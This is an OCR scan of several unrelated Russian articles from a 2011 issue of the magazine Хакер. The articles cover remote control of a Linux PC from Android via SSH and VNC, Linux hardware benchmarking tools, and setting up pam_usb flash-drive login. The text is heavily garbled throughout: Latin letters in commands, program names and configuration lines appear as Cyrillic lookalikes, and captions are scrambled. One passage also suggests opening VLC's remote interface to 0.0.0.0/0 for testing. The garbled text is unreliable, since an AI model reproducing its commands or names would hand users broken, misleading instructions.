подключаться кустройству с помощью любого 55Н-клиента, 
например, стандартного $51: 


$ $5Н апаго1а@192.168.0.100:2222 


Достучаться до компа 


Выполнить обратное подключение (устройство — комп] 


с помощью Апаго!а гораздо проще. В маркете есть масса 
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Апаго@ УМС 
\Ле\ммег 


Запустить сер- 
вер \\еб5пайпа 
проще простого 
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разнообразных 55Н-клиентов, лучшим (и ктому же бес- 
платным] из которых является Соппес{Во\*. Этот 55Н-клиент 
обладает массой настроек, поддерживает почти все функ- 
ции 5$Н и ктому же проств использовании. Чтобы сего 
помощью подключиться к своей домашней машине, просто 
запусти приложение, согласись слицензией [АрасВе 

| /сепзе 2.0, кстати}, несколько раз нажми кнопку «Далее» 
(хотя описанные хинты можно и почитать} и вбей в окне 
ввода имя удаленного пользователя и хоста в формате 5ЪН. 
После этого соединение будетустановлено, иты сможешь 
рулить компом, как захочешь. Проблема Соппес(Во{ только 
в том, что он не имеет механизма запоминания или бы- 
строго выполнения часто используемых команд, а без этого 
управляться сним довольно тяжело. Однако и эту проблему 
можно решить сразу несколькими способами. Во-первых, 
никто незапрещаетнам писать скрипты/алиасы и называть 
их простыми двухбуквенными именами (например, «рх» 

— «ртдхаКер.ги»}, а во-вторых для решения этой задачи 
вАпаго!а есть приложение [ айег Сеек. [Га71ег СееК — это 
простая бесплатная программа для быстрого выполнения 
часто используемых команд с помощью клика по кнопке. В 
отличие от других подобных софтин, доступных в маркете, 
этотпомощник быстро стартует и имеет простой интерфейс, 
не загроможденный ненужными элементами управления. 
Чтобы начать пользоваться программой, достаточно за- 
пустить Гатег еек, нажать кнопку «Меню» и заполнить 
появившуюся на экране форму: в поле Мате следует 
вписать имя удаленной машины, в поле Ноз{ — имя хоста 
или [Р, заполнить поля Цзеги Раз$. Ниже следует вписать 
имя команды, которое будет отображаться в списке, и саму 
команду. После этого нажимаем кнопку «Зауе» и попадаем 
на главный экран приложения, где будут перечислены все 
забитые нами команды. Для выполнения любой из них до- 
статочно простотапнуть по имени. 


Пульт дистанционного 
управления 


В маркете есть огромное количество самых разнообразных 
пультов для удаленного управления медиаплеером. Боль- 
шинство изнихтребуютустановки сервера, который будет 
обслуживать запросы клиентской программы, запускать 
необходимые приложения и отдавать им команды. Обычно 
реализация серверов естьтолько для \\Ип4о\\®, ате из них, 
которые могут работать в Чпих, требуютустановки среды ис- 
полнения /ауа, что врядли понравится большинству линук- 
соидов. Поэтому мы рассмотрим толькоте пульты, которые 
не требуютустановки каких-либо приложений на комп. 
Первый пульт, о котором я хотел бы поговорить, — 
5$Нтоте. Он позволяет рулить пр(ауег, УС, Атагок, 
КаНетп и многими другими плеерами с помощью команд, 
отсылаемых по протоколу $$Н, поэтому нетребует нето, 
что сервера, а вообще чего бы то ни было, кроме корректно 
работающего 55Н-сервера. 

Использовать >5Нтое довольно просто. После старта про- 
грамма предложитуказать данные $5Н-сервера, выбрать 
медиаплеер из списка поддерживаемых из коробки [можно 
самому создать конфигурацию для других программ) и дать 
указанной конфигурации имя (например, «Ноге гор[ауег»). 
После чего на экране появится список конфигураций, по 
клику на одной из которых возникнет окно, в котором можно 
выбрать медиафайл. После того как выбор будет сделан, 
появится интерфейс управления плеером, в котором есть 
кнопки «Стоп/Пауза», «Перемотка», «Громкость» ит.д. 
55Нгтое подкупает своей универсальностью и простотой 
использования, однакоу него есть один существенный не- 
достаток: если 55Н-соединение отвалится, получить доступ 


куже запущенному плееру будет невозможно, и никакие 
5сгееп и прочие ухищрения тут, по понятным причинам, не 
помогут. Поэтомутем, кто предпочитает использовать \УЁС, я 
бы порекомендовал обратить свой взор в сторону отлич- 
ного и полностью свободного У С-клиентаУЕС-Ветоте [в 
маркете есть несколько приложений стаким названием, 
поэтому надо искать тот, который написан человеком по 
имени Рщег Ва[9\/п). 

УМС Кетое нетребуетустановки специального сервера, 
однако, чтобы он заработал, УС следует запустить с под- 
держкой встроенного НТТР-сервера. Сделать это можно с 
помощью следующей команды: 


$ м1с --ехЕга1п+=1иай р --№и115сгееп \ 
--ИЕр-а1Бит-аг* --4*-$Фаг{-т1п1т17еа 


Однако, чтобы \УЁС пустил нас, требуется также добавить [Р 
телефона в список разрешенных к подключению хостов: 


$ си -5 
# есрпо °123.456.789.012? >> /изг/зПаге/\м1с/1иа/ 
ПЕЕр/ .По$1$ 


В целяхтестирования можно использовать 0.0.0.0/0 
вместо |Р-адреса, тогда доступ к интерфейсу удаленного 
управления получат все. После этого можно запустить 
клиент, нажать кнопку «Выброс» (сверху, рядом с изобра- 
жением обложки альбома], далее тапнуть по пункту меню 
«АЧа\ЕС зегуег» и вписать |[Р-адрес сервера в появив- 
шееся поле. Теперь можно добавлять файлы в плейлист (с 
помощью все той же кнопки), управлять воспроизведени- 
емит.д. Подобные приложения есть и для других медиа- 
плееров, например, Атагок2 Кетоте, ВапзПее Кетофе и 
пуаго!а для Му ТУ. Все они доступны в маркете и абсо- 
лютно бесплатны. Также существует прекрасный клиент 
для многих Тоггеп{-клиентов под названием Тгап$агоиа. 
Он полностью открыт и бесплатен, однако недоступен в 
маркете, поэтому придется качать прямо с сайта разра- 
ботчика [ОР-код ведетименнотуда). ТгапзЧго!4 под- 
держивает почти все популярные Тоггет{-клиенты для 
[/пих, методы настройки каждого из которых отличаются. 
Я не могу описать их все, поэтому остановлюсьтолько на 
самом популярном — Тгапзпп151оп. Настроить удаленный 
доступ к Тгапзппи5$1оп довольно просто. Для этого следует 
зайти в меню «Правка -> Настройки» и перейти на раздел 
«\/\еб». Далее ставим галочку напротив опции «Включить 
уиеб-клиент». Чтобы кто угодно не могподключиться к 
программе, отмечаем опцию «Использовать аутентифи- 
кацию» и вбиваем имя и пароль. Теперьустанавливаем и 
запускаем ТгапзЧго!а, нажимаем «Открыть настройки», 
далее «Добавить новый сервер», вбиваем произвольное 
имя, выбираем тип сервера [Тгапзгп!5$!оп], набираем |Р- 
адрес, указываем порт 9091, отмечаем чекбокс «Исполь- 
зовать авторизацию», вбиваем имя и пароль, возвраща- 
емся на главное окно приложения, где нас должен ждать 
интерфейсуправления. 


Рабочий столтудаи обратно 


Теперь поговорим отом, как получить доступ к рабочему 
столу компа со смартфона и обратно. Лучшее, что было 
когда-либо придумано программистами на этутему, это про- 
токол УМС [в плане простоты реализации и распространен- 
ности он вне конкуренции]. УМС-клиенты и серверы есть 
для любой, даже самой экзотической ОС, втом числе для 
Апагоиа и [Чпих. Один из самых простых и удобных Апагою- 
клиентов, это Апаго!а УМС \Лемег, доступный в маркете 
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Е Е Е ЕТ И РЕН тои 


=Ибомимозвь Гия. Резка! МЕС Вептоке [176.211.160.170:5030] Яго УМС зе гуег 
Тмип_РеаК$.Еге \М/а!К_ М/И Что а УМС бегуег 


ТОШЕА СОГУ 

а, р =. = | 

№ Г 1 УЕ. 1 п. 
вы 


ор ъегуег 


Кип? 


в [25 
даы а 


0:00 0:00 


5Нитое выглядит ужасно, но выпол- УМС Кетое — просто и со вкусом \МС-сервер? Легко! 
няет свою работу хорошо 


абсолютно бесплатно. Чтобы настроить доступ к рабочему Вместо заключения 


столу компа сего помощью, нужно сделать следующее: В этой статье описана лишь часть приложений, способных 
1. Установить на машину УМС-сервер: соединитьтвою домашнюю машину со смартфоном на базе 
Апаго!а. На самом деле существуют сотни самых разноо- 
$ зид0 ар*-5е* 1п$%а11 +121 \пс бразных софтин, которые могут быть полезны в этом деле. 


Упомяну лишь некоторые изних: \\/ 1 Кеубоага, позво- 
2. Создать конфигурационный файл -/ упс/х$айир в своем — ляющая использовать комп какудаленную клавиатуру; 


домашнем каталоге, прописав в него следующие строки: СВготе {о РВопе — официальное приложение боод(е 
для открытия ссылок из браузера СВготе нателефоне; |Р 
$ №1 -^/ .упс/х$агеир \\Мебсат, превращающая смартфон в меб-камеру; Кетфе 
хгаь $НОМЕ/ .Хгезоигсе$ \М\Меб ОезКор, сочетающая в себе функции многих рассмо- 
<фагЯихЬох & тренных в статье приложений; МадМопОго!а, позволяю- 


щий мониторить сервер сустановленным Мад!о$; Хаббих 
Во второй строке следуетуказать команду запуска менед- оп {Пе до — удаленная ГХабЫх-консоль. == 
жера окон (например, %“а{Кае). 
3. Запустить сервер командой упсзегуег, дважды ввести 
пароль на доступ к рабочему столу и ввести «п» в ответна 
последний вопрос. 
4. Запустить Апаго!а УМС \Мемег, заполнив поля Ра$$\ога 
(тот самый пароль}, Адагез$ (|Р-адрес хоста}, Рог (здесь 
следуетуказать 5901 вместо 5900] и выбрав пункт 24-6 
со[огв списке Со(ог Гоггппа\, остальные поля можно оста- 
вить незаполненными. После нажатия кнопки «Соппес> 
на экране появится рабочий стол суказанным ранее 
оконным менеджером. 
Возможнатакже и обратная конфигурация, при которой на 
экране компа появляется рабочий стол смарта. Для этого 
на устройство необходимо установить УМС-сервер аго!а 
УМС 5егуег, запустить программу и нажать кнопку «За" 
Зегуег». После чего к смартфону можно будет подключить- 
ся спомощью команды упсмемег: 


$ упсу1емег ТР-адрес: 5901 


Для доступа можно использовать и браузер, изменив 


номер порта на 5801. 
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ПОПУГАЕ 


Обзор утилит 
‚для тестирования 
производительности 


® Так сложилось, что под самую распространенную ОС полно 
всяких разных бенчмарков на любой вкус и кошелек: 5150 запага, 
ЗОМагк, РСМагК и другие. Под тх’ы выбор поскромнее, но и этого 
вполне достаточно, чтобы покрыть все потребности. 


СРУ 


Первое, что обычно описывают в конфигурации компа — СРУ. Вотза него 
сначала и возьмемся. Один из эталонных процессорныхтестов под винду 
— бирегР!. Он есть и под Ипих, но давно не развивается и не работает на 
современных дистрибутивах [про 64-битные ОС даже ине слышал). Зато 
в Ипих есть функциональный аналогснехитрым названием Р'. Ставим: 


# арф-сеф 1п$%а11 р1 


В отличиеот виндового аналога, Р! норовитвывести получившееся 
число на экран и самостоятельно не считает затраченное время. Поэтому 
запускаем так: 


$ Е1те р1 1948576 >/де\у/пи11 | вгер геа1 


Такмы замеряем время, необходимое для вычисления числа Р!сточно- 
стью до 10485'76 знаков после запятой. У моего ноута с [г{е[Соге 15-2410М 
на это ушло 01.6755, ау рабочего компа с |\е[ Соге 15-2300 — Огп0.137°. 
Не сильно впечатляющая разница, учитывая, что на рабочем компе 
физических ядер в два раза больше, чем в ноуте. Объясняется этотем, что 
Р(каки бирегР!) — однопоточный. В современных реалияхэто никуда 

не годится. Хороший вариант многопоточноготеста — встроенныйв 7-7!р 
бенчмарк СРИ (операция архивирования/разархивирования ложится, в 
основном, на процессор). Запуск бенчмарка: 


фа 


Тествыполняется несколько раз для верности, по окончании будетвы- 
дано среднее значение. Из интересной информации, которую бенчмарк 
нам сообщит: скорости архивирования/разархивирования в КВ/5, 
сколько он занял процессора во времятестирования [в процентах) и свой 
собственный рейтингв М!Р5 [миллионы операций в секунду). В Сети 
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обычно меряются именно этими М!Р5’ами (в Мпих’овой версии теста это 
строчка То\). 

|п{е[Соге 15-2410М показалтакие значения: 344, 2065, 7064. Первая циф- 
ра — утилизация процессора во времятеста (в процентах), третья цифра 
— собственно, рейтингв М!Р5’ах, а вторая — это рейтинг, поделенный на 
нагрузку (можно это грубо представить в качестве производительности 
одного ядра). 

Для сравнения цифры на м{е[Соге 15-2300 (соответственно): 357, 3049, 
10771. 

Модульный многопоточный инструментизмерения производительности 
узБепсй также предоставляет возможность прогнатьтест СРИ. Реализа 


ция теста очень проста — вычисляются все простые числа доуказанного. 
$ эузбепсН --Ее$%=сри --сри-тах-рг1те=20000 гип 


Самая интересная строчка, которой и можно меряться — последняя: 
сколько всего времени в секундах занялтест. Результат Соге 15-2410М — 
30,9614, Соге 15-2300 — 27,8938. 

Естьтакже бенчмарки с СЦ] — например, Вагапто. Основное назначение 
проги — вывод информации о компе вчеловекочитаемом виде. Кроме 
того она позволяет прогнать несколькотестов и сравнить результаттвое- 
го СРУ снесколькими заранее забитыми значениями. Довольноудобно. 
Жаль, проектбольше не развивается. 


ОЗУ 


Обычно, когда говорят про ОЗУ, упоминаюттолько ее объем, не касаясь 
пропускной способности. Пожалуй, самый простой способ протести- 
ровать пропускную способность ОЗУ в Ипих — прога плЬ\м (Меппогу 
Вапо\М/с{|). Поставить ее несложно — есть в репозиториях большинства 
дистрибутивов. Принцип работы проги прост: в оперативке выделяются 
два массива данныхуказанного размера, а потом один из них копируется 
в другой. Тесты прогоняются несколько раз [поумолчанию — 10], после 
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Проект был запущен 28 февраля 2011 года на выставке Зошегт Са|- 


Тоггиа ипих Ехро. В середине июня подвели некоторую статистику: 


® было загружено 41258 результатов тестов; 

® насчитано 89,217 запусков РТФ (отсчет велся по обращениям к 
орепбепсбгпагКпа.ога}; 

® собрана статистика по 32189 РС|-устройствам и 16536 Ц$В- 
устройствам; 

» обработано 325351 поисковых запросов пользователей. 


Самые популярные компоненты на момент написания статьи: 


® ОС — Убит 
э® СРУ — ще! 
» РУ — М№ма'!а 


® Производитель матплат — Азиз 
® НОО — Затзипа 
® [5 — ехм 


чего вычисляется среднее значение. Думаю, проще всего сразуего от- 
фильтровать: 


$ шЬм 512 | вгер АМС 


Здесь 512 — размер массива в Мб. Надо понимать, что реально длятеста 
нужно в два раза больше свободной памяти. 

В результате выполнения этой команды мы получимтри строчки — по 
одной для каждого проводимого гпбм/-теста, где самое интересное — в 
последней колонке (собственно, пропускная способность). На ноутеу 
меня получились следующие цифры: 


А\/с Метпо4: МЕМСРУ Сору: 2765.609 М1В/$ 
А\/с Метпоа: БУМВ Сору: 4248.589 М1В/5 


А\/б Мефроа: МСВЕОСК Сору: 11930.338 М1В/$ 


Ана рабочем компе: 
А\/с Мефпо4: МЕМСРУ Сору: 5372.418 М1В/$ 


А\/с Метпоа: БУМВ Сору: 7563.436 М1В/5 
А\/б Мефроа: МСВЕОСК Сору: 13755.269 М1В/$ 


Уже знакомый нам эузбепсй тоже умееттестировать ОЗУ. 


$ зузБепсй --е$%=тетогу гип 


ХАКЕР 09 /152/ 2011 


Тест СРИУ с помощью архиватора /-7р 


И опять самое интересное — это последняя строчка. 


На ноуте: 

ехеси1оп {1те (ау): 32.6897 
На рабочем компе: 

ехеси1оп {1те (а\уё): 29.8387 


Параметровтестирования ОЗУу эузбепсй побольше, чем параметров 
тестирования СРУ. По умолчанию тестируется операция записи. Тестиро- 
вание операции чтения будет выглядетьтак: 


$ эузбепсН --{е$%=тетогу --тетогу-орег=геаа гип 


У меня этоттестзанял 20,0857 на ноуте и 19,5404 на компе. 


НОО 


НОВ в современных конфигурациях часто является узким местом. Пожа- 
луй, самый простой способузнатьего скорость — с помощью Варагт: 


Парагм - /аеу/$Ча 


На ноуте 2,5" НОО с5400ВРМ выдает результат в 75,80 МВ/зес. 550 [г(е| 
320 может похвастаться 222,93 МВ/5ес. Тествыполняет простое последо- 
вательное чтение, поэтому не очень информативен. 

Более точный, нотребующий чуть большего количества телодвижений 
инструмент для тестирования винта — узБепсв. Во-первых, он поддер- 
живает несколько режимовтестирования: 

® ег — последовательное чтение; 

® 5е0\/г — последовательная запись; 

® ед ге\/г — последовательная перезапись; 

® гпОг — случайное чтение; 

® гпО\М/г — случайная запись; 

® гп п// — комбинация случайных чтения и записи. 

Из всех этих режимовя выбрал последовательные и случайные чтение и 
запись. Допустим, для начала протестим последовательное чтение. Пре- 
жде чем запуститьтест, нужно сгенерить для него файлы: 


$ эузБепсН --{е$+=А1е1о --Я1е-0а1-$17е=106 \ 
--11е-+е5{-тоде=5едга ргераге 


Втекущем каталоге появится россыпь файлов с префиксом {е${. Опция 


'--е-{щю«аняте' нужна, чтобы нивелировать влияние кеша ОС, ее значе- 
ние должно быть больше объема ОЗУ. Теперь запустимтест: 


$ эузБепсН --Я1е-{о%а1-$17е=106 --+е5{=81е1о \ 
--11е-+е5{-тоде=5едга гип 


Самым интересным ввыводе будет скорость передачи данных. 


› 099 


Тестовый пакет 5узБепсп: последовательное чтение данных 


Приберем за собой (удалимтестовые файлы): 


$ эузБепсН --{е$+=#71е1о --Я1е-+0%а1-$17е=106 \ 
--81е-$е5{-тоде=5еага с1еапир 


Для винта в ноуте у меня получились следующие значения: 


* зедга -— 42.675МЬ/5ес, 2731 ТОР$ 
* зедмг — 47.377МЬ/5ес, 3032 ТОР$ 
* гпага — 1.3463МЬ/5ес, 87 ТОР$ 
* гпамг — 1.5153МЬ/5ес, 97 ТОР$ 


Для 550: 


* зедга — 263.1МЬ/5ес, 16838 ТОР$ 
* сеомг — 121.95МЬ/зес, 7804 ТОР$ 
* гпага — 390.63МЬ/зес, 25000 ТОР$ 
* гпамг — 70.559МЬ/5ес, 4515 ТОР$ 


Следующий по возможностям бенчмарк — Бопте++. Онтестируеттри 
вещи: скорость чтения и записи (посимвольно и поблочно), количество 
запросов в секунду и количество операций с метаданными файлав 
секунду. Полезным дополнением служит фиксирование использования 
СРИ [В процентах] во времятестов. Вывод Бопт!е++ представляет из 
себя р[атп-{ех(с 80 колонками, о который можно запросто сломать глаза. 
Поэтому результат лучше сразу конвертить в Ргт(: 


$ Бопп1е++ -п 1024 | %а11 -1 | Боп_с$\у2/ 1 \ 
> Боп_гези1{.Ит1 


Опция '-п'’ указывает на количество файлов, которые будут созданы 
при тестировании операций с метаданными (указанное в опции число 
умножается на 1024}. Увеличение этого числа относительно дефолт- 
ного значения нужно втом случае, если операции по записи/чтению 
метаданных проходят слишком быстро, и бенчмаркне успевает за- 
фиксировать время (в таком случае в поле времени этого теста будет 
«+++++>]. 

На 550 скорость поблочной последовательной записи [129 МЫзес] и 
чтения (315 МЬ/зес] оказалась несколько больше, чем в сузБепсп. Пустые 
файлы могут создаваться со скоростью 48348 операций в секунду, а 
удаляться — со скоростью 6464 операций в секунду. Метаданные могут 
читаться со скоростью 1090971 попугаев в секунду. 

И, наконец, наверное, самая фичастая утилита — 1охопе. Запусктеста с 
выводом результатов в файл: 


$ 1огопе -Ва -в 106 > 1охопе.х1$ 


Где '-а‘ — запуск всехтестов, '-К' — генерировать совместимый с Ехсе! 
вывод, '-д' указывает максимальный размер файла длятестирования 
(он должен быть больше размера ОЗУ). Тутнадо быть готовым, что на 


> 100 


| , 
Ш | 

медленных дисках этоттест работает очень долго. После завершения 

теста ютопе.х[$ будет представлять из себя группу матриц [по одной для 

каждого теста], где строка — размер файла, а столбец — размер фрагмен- 

та чтения/записи. 

Потом тот файл можно будет открыть в ИБгеО! се и построить по нему 

графики. Но руками что-то делать не хочется, особенно, когда надо всего 

на один раз глянуть. Поэтому стохопе идет скрипт, который позволяет 

построить график с помощью дпир[©*. 


(Швейцарский нож 


Обычно бенчмарки позволяют протестировать какую-нибудь одну подси- 
стему компа. Но встречаются иуниверсалы, самый многообещающий из 
которых — РВогопх Тез{ЗиКе [далее для краткости — РТ$). Сразу ставим 
ему плюс за кроссплатформенность и лицензию СРИУЗ. Установить его 
просто — часто встречается в репозиториях популярных дистрибутивов, 
например, в Убиты: 


# арт -веф 1п$Фа11 рПогоп1х-Фе$*-зи1е 


Притянетза собой несколько зависимостей в виде интерпретатора РНР 
и пары библиотек. Как вариант, можно скачать с офсайта (рпогогих-{е${- 
5иКе.сого) Чеб-пакет или архив с исходниками. Естьтакже уе-версия, 
но сильно устаревшая, крелизу 3.4 [ориентировочно в сентябре] 
обещаютобновление. Один из приятных плюсов [/\е-версии — то, что 
большая часть доступныхтестов уже скачана, можно свободно обойтись 
без подключения кинету. 

До версии 3.0 был СШ, но его убрали, так как был написан на РНР- 
СТК2, который скорее мертв, чем жив. Думаю, сильно расстраиваться 
из-за отсутствия СУ не стоит — вС-интерфейсе всего пара команд, 
в которых сложно потеряться. В крайнем случае, есть интерактивная 
оболочка: 


$ рпогоп1х-+е${-зи1{е 1п%егас®1уе 


Список всех доступныхтестов: 


$ рпогоп1х-+е${-зи1{е 115%&-ауа11аб1е-{е$%$ 


При первом запуске может задать несколько вопросов: согласиться 
слицензией и разрешитьанонимную отправку конфигурации ПО/ 
железа и способов использования. Списоктестов стягивается с сайта 
орепбепсйтагкта.ога, поэтому нужен рабочий инети включенные 
опции аЦоми иг! Тореп, е_ир®ад$, аЦоми/ ип_тсшаев РНР. 

Всетесты разделены на категории в зависимости отподсистемы, которую 
нагружают. Полный список включает в себя: у$егп, Ргосеззог, Метогу, 
От®К, СгарРис$, Ме\миогк — протестировать можно совершенно все. 
Правда, в Ме\могК всего одинтест: Гоорбаск ТСР Мемогк Регюггпапсе. 
ВРТЗ 3.2.1 на моментнаписания статьи было доступно 118 тестови 46 
тестовых наборов. 

Допустим, мы остановились на каком-тотесте. Прежде чем его запускать, 
разумно просмотреть информацию онем: 


$ рпогоп1х-+е${-зи1{е 1пРо сотрге$$-771р 
По крайней мере, это дастколичество трафика, которое потребуется, 
чтобы прогнать этоттест [ибо некоторыетесты качаютпомногу, а чтобы 


загрузить все тесты, потребуется более 10 Гб). Кстати, все скачанные 
тесты с помощью команды 


$ рпогоп1х-+е5{-зи1{е таКе-домп1оаа-сасйе 
можно перенести в каталог -/.рвогопх—{е<{-зиКе/дом/ип([оаЧ-сасВе/, 


который потом можно разбросать по другим компам. 
Запусктеста скорости архивации спомощью 7-71: 


$ рпогоп1х-+е5{-зи1{е БепсйтагК сотрге$$-721р 
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Бенчмарк производительности оперативки 


После запуска РТ$ потащит с офсайта исходники определенной версии 
7-ир и при необходимости соберетих. РТ$ старается не использовать 
пакеты из репозиториев, чтобы максимально абстрагироваться от дис- 
трибутивов, где могут присутствовать какие-то патчи или другие версии. 
Единственное — библиотеки для сборки и компиляторы устанавливают- 
ся спомощью стандартного менеджера пакетов. 

К сожалению, штатными средствами РТЪ нельзя запустить несколькоте- 
стов последовательно. Частично обойти это ограничение можно, исполь- 
зуя наборы тестов. Список доступных наборов можно посмотретьтак: 


$ рпогоп1х-+е5{-зи1{е 115%&-ауа11аБ1е-зи1%е$ 


К примеру, списоктестов в наборе сотрцайоп: 


* рё$5/Би11а-арасйе 

* рЕ$/Би11а-рНр 

* рЕ$/Би11а-тр1ауег 

* рё$/Би11а-11пих-Кегпе1 
* рё5/Би11а9-1тавета51 ск 


Кроме обычныхтестовых наборов с фиксированным наборомтестов есть 
еще виртуальные наборы, количествотестов в которых зависитот каких- 
либо условий. 


$ рпогоп1х-+е5{-зи1{е 115*-ауа11аб1е-у1гиа1-зи1%е$ 


На мой взгляд, самые полезные из них: 


* а1 1 -— все тесты; 

* 1п5{а11е4 -— все установленные тесты; 

* зузтеп|ргосе$5ог | вгарН1с$ — все тесты для тестирования 
определенной подсистемы. 


Одно из основных достоинств РТ5 — симпатичные НТМЕ-отчеты, кото- 
рые предлагается просмотреть в браузере после прохождения каждого 
теста. Ихтакже очень удобно мержить командой тегде-гези($. Нуа 
список доступныхтестов можно посмотреть командой $По\м/-гезий. 
Собственно, РТ$ не представляет из себя чего-то сверхъестественного — 
просто довольно удобная оболочка для запуска стороннихутилит. Но все 
меняется, когда приходит орепоепсВгпагкипа.ога — сайт, с которым РТ 
тесно интегрирован. С этого сайта тянутся тесты, и на него (при желании] 
загружаются результатытестов. За довольно короткое время с момента 
запуска там накопилось более ЗОО тысяч тестов. Теперь можно легко 
сравнить производительность разных аппаратных компонентов в Чпих 
и других ОС. Или найтитесты своей железки, чтобы понять, должный 
лиунее уровень производительности, или надо искать баг. Еще можно 
сделать своитесты или наборы, загрузить их на орепбепсйтагкипа.огд, 
и потом они будутавтоматически синхронизироваться на всех компах 
СРТФ, как, впрочем, и результаты тестов. Попросить РТ$ использовать 
учетку на орепбепсбтагк!п9.огд можно следующим образом: 
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Тестовый комплект РПогопх Тез 5ийе 


$ рпогоп1х-+е5{-зи1{е орепбепсИтагК1п8-1051п 


Ещеодин плюс РТ$ — простота создания и изменениятестовых профилей 
и наборов. Все доступныетесты скачаются с сайта орепрепсйтагК!п9.0га 
в каталогпользователя: -/.рВогопх-{е${-зицеде${-рговез/р(, где можно 
точно посмотреть, какойтестчто делает и, в случае чего, поправить. 
Например, уменя тестбиЦа-рЮр отказывался ставиться потому, что он 
пытался стянуть с зеркал рйр версии 5.2.9, который уже не поддерживает- 
ся, и на зеркалах его нет. Для исправления этой ошибки достаточно было 
в файле дом/п{оаа$.хгп[ исправить пути на более новую версию и чуть-чуть 
поменять версии в скриптах рге- и розип{аЦ.$П. 


Сеть 


Как обычнотестируют сеть? В случае синетом, пожалуй, самый популяр- 
ный способ — рее Ще. пе или иегпеуапаех.ги. Еще один довольно 


действенный способ — какой-нибудь популярный торрент [например, 
последний релиз Убит). То есть, с инетом все более-менее понятно. Но 
как быть в случае ЛВС? Самыйтопорный способ — просто создать файл 
побольше и кидать его по сети через пс. 

На сервере запускаем пс, слушающий порт 1234: 


$ пс -4 @ -1 1234 > /&тр/Б1= А1е 


На клиенте отправляем на сервер какой-нибудь большой файл, замеряя 
время: 


$ Е1те сае /&тр/61=_Н1е | пс -а09 зегуег ТР 1234 


Есть более точные инструменты, самый удобный из которых, на мой 
взгляд, — 1рег. 
Ставим: 


# аре-ве{ф 1п$Фа11 1рег+ 


На одном из компов в сети выполняем: 
$ 1рег -$ 
Откроется портТСР/5001. На другом компе выполняем: 


$ 1рег+ -с зегуег_По$* 


В выводе сервера в колонке Вапамиа{ отобразится пропускная способ- 
ность сервера. 

Десять секунд — маловато, поэтому рекомендую с помощью опции кли- 
ента '-Г установить хотя бы шестьдесят. 

По умолчанию рег! тестирует ТСР-протокол. Можно попросить еготести- 
ровать ЧОР, добавивопцию '-ч’ксерверу и клиенту. Тестирование ЧОР 
полезнотем, что отображается количество потерянных пакетов, по чему 
можно судить о качестве соединения. = 
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ПОСТОРОННИМ 
ВХОД ВОСПРЕЩЕН 


Используем современные методы входа в систему 


э Тебе никогда не приходила в голову мысль о том, что идея 
использовать логин и пароль для входа в систему несколько устарела? 
Почему, имея в одном кармане флешку, в другом — телефон, а на 
компе установленный 55Н с настроенной авторизацией при помощи 
ключей, мы продолжаем вводить эти запутанные пароли? 


Пароли и учетные записи были придуманы в эпоху больших мейн- 
фреймов, движения хиппи, войны в Афганистане и больших анало- 
говых магнитофонов, самым технологичным компонентом из которых 
были транзисторы. В те времена использование паролей для входа 

в мейнфрейм выглядело действительно круто. Можно было приду- 
мать комбинацию вроде зехПего или1атзиреггап и действительно 
гордиться собой. 

Сегодня же пароли выглядят не только архаичной, но и ужасно 
неудобной вещью, старые понтовые комбинации уже не работают, и 
вместо них приходится придумывать зубодробительные наборы сим- 
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волов, которые нетолько нереально запомнить, но и проблематично 
ввести с первого раза. Мы живем в ХХ! веке, имеем доступ к огромно- 
му количеству гаджетов и технических средств, которые предлагают 
гораздо более простой и качественный механизм аутентификации, но 
продолжаем вбивать пароли, матерясь на всю квартиру при каждой 
неудачной попытке войти в систему. Пора это исправить. 

В этой статье я расскажу о том, как раз и навсегда избавиться от паро- 
лей и превратить свой комп в по-настоящему технологичное устрой- 
ство, для входа в которое будет достаточно вставить флешку, взглянуть 
ввеб-камеру или просто положить на стол сотовый телефон. 
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Зари а прин Бы те 
чтАнно Г 
ны 
ЗЕбайьгы Ге еь о нев, пы 
орет т Ревый Я 


С помощью фрийт дето можно наглядно озна- 
комиться с возможностями ПОрий] 


Высокотехнологичный ключ 


Ключ — самый простой и эффективный метод защиты чего 
быто ни было. Мы пользуемся ключами ежедневно: для 
включения двигателя автомобиля, для входа в квартиру, 
для отпирания ящиков и шкафов. Ключи удобны и просты 
в изготовлении, благодаря современным программи- 
руемым замкам их не страшно потерять. Множество раз 
человечество пыталось придумать замену ключам, но все 
попытки провалились [все мы помним, кчему привела 
идея использовать кодовые замки на подъездных две- 
рях]}. Почему же мы не используем столь хорошую и прове- 
ренную временем технологию для защиты компьютеров? 
Современный аналогключа — У$В-флешка. Внеза- 
висимости оттого, для каких целей ты обычно использу- 
ешь флешку, из нее всегда можно сделать полноценный 
высокотехнологичный ключ, с помощью которого войти в 
систему будеттак же легко, как отпереть дверь в квартиру. 
Есть несколько способов сделать это, но наиболее 
простой и универсальный метод — это использовать 
РАМ-модуль рап_и$Б (рагппизЬ.ога), который будет про- 
верять каждую вставленную в комп флешку на предметее 
соответствия указанным требованиям и, в зависимости 
от результата, разблокировать или блокировать учетную 
запись пользователя. 

Никакой модификации таблицы разделов или информа- 
ции, хранимой на флешке, при этом не потребуется. Для 
идентификации «правильной» флешки используется ее 
серийный номер, модель, производитель, а также набор 
случайных данных, которые записываются в резервную 
область флешки и изменяются при каждой удачной 
аутентификации (если кто-то скопируеттвою флешку, но 
ты успеешь войти в систему раньше злоумышленника, 
данные будут изменены, и его копия уже не сработает). 

В случае утери всегда останется возможность войти в 
систему, используя пароль, и перекодировать рапт_и$6 на 
новую флешку. Также в качестве ключа можно использо- 
вать различные карты памяти (50, ММС] и другие съем- 
ные накопители. Начать использовать рат_из6 довольно 
просто. Полная настройка системы состоит из пяти шагов. 
1. Ставим библиотеку Ибрат_ч$Б.50 и утилиты управле- 
ния модулем: 


$ зи4о ар*-ве{ 1п5%а11 116рат-ч$6 рати$6-001$ 
2. Берем флешку, которую собираемся использовать в 
качестве ключа, вставляем ее в У$В-порти выполняем 
следующую команду: 


$ эиао рати$6-соп+ --ад9а-аеу1се имя 
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#РАМ-1.В 

ацеП геци1 фе рат_по1091п.50 
аце геи гео рат_епу. 50 

ВАН и Ес рег рат_и5Ь. 50 

ав Зи Ес реп рат_Трг {п.о 
Эш геди!гед рат_уп{х, 530 
ассоип{ геи гед рат_игЁх.530 
раззшого геци1гед рат_ип1х. 30 
зезз1оп геци1гед рат_ 11143,30 
5255 ТОП геци!гед рат_ип{х, 50 
зе55 топ ор 1опа]1 рам_10010410.50 
3035 топ ор 1опа]1 рам_скК_соппестог .з0 


Добавляем модули рат_и$Ь и рат_рит в стек РАМ 


Такрат_и$6 соберетвсю необходимую информацию о 
флешке, добавит в свою базу данных и запишет2 Кб случай- 
ных данных. Для поиска флешки в системе будет исполь- 
